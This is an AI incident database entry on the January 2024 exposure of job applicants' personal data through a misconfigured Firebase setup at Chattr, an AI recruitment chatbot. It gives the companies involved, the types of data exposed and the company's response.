AI hiring chatbot hack violates job applicants' privacy
AI hiring chatbot hack violates job applicants' privacy
Occurred: January 2024
Report incident 🔥 | Improve page 💁 | Access database 🔢
A group of hackers gained access to AI recruitment chatbot Chattr, revealing sensitive information about job applicants, fast food franchises, and Chattr itself.
Pseudonymous hacker MRBruh and others discovered that Chattr had inadvertently exposed data about itself, its customers - specifically Chick-fil-A and Subway - and their job applicants, through an incorrect Firebase configuration, including personal names, telephone numbers, email addresses, passwords, and messages.
The hack also revealed how Chattr's system worked, including the AI appearing to have the ability to accept or deny job applicants automatically. Chattr secured its system after the hack was made public, though failed to acknowledge publicly the incident.
The incident prompted suggestions that Chattr is likely one of many AI companies to have overlooked security and data privacy in the rush to get their products to market.
Operator: Applebees, Arbys, Chick-fil-A, Dunkin Donuts, IHOP, KFC, Shoneys, Subway, Tacobell, Target, Wendys
Developer: Chattr
Country: USA
Sector: Business/professional services; Food/food services
Purpose: Recruit employees
Technology: Chatbot; NLP/text analysis; Neural network; Deep learning; Machine learning; Reinforcement learning
Issue: Confidentiality; Privacy; Security
Page info
Type: Incident
Published: January 2024